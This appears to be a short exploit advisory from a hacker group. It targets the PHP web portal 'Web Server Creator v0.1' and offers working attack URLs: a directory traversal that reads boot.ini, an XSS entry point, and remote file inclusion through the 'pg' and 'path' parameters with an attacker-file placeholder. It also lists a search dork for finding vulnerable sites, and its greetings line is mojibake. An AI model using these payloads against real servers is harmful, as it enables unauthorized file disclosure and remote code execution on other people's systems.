======================================================================================== | # Title: Web Server Creator - Web Portal v 0.1 Multi Vulnerability | # Author : indoushka | # email: indoushka@hotmail.com | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | # Web Site : http://www.comscripts.com/scripts/php.web-server-creator.1082.html | # Dork : All right reserved 2002-2003 (MSN/Web Server Creator) | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | # Bug: Multi ======================Exploit By indoushka ================================= # Exploit: 1- Directory traversal (Windows) http://127.0.0.1/1082_webserve-01/news/include/customize.php?l=../../../../../../../../boot.ini 2- XSS http://127.0.0.1/1082_webserve-01/index.php?pg=forum 3- RFI http://localhost/1082_webserve-01/index.php?pg=[EV!L] http://localhost/1082_webserve-01/news/form.php?path=[EV!L] ================================ Dz-Ghost Team ======================================== Greetz : ÓíÏí ÈáÚÈÇÓ + Úíä ÇáÈÑÏ + ÔáÛæã ÇáÚíÏ K10 + K@MEL + Úíä ãáíáÉ + ÊÛäíÝ -------------------------------------------------------------------------------------------
体验盒子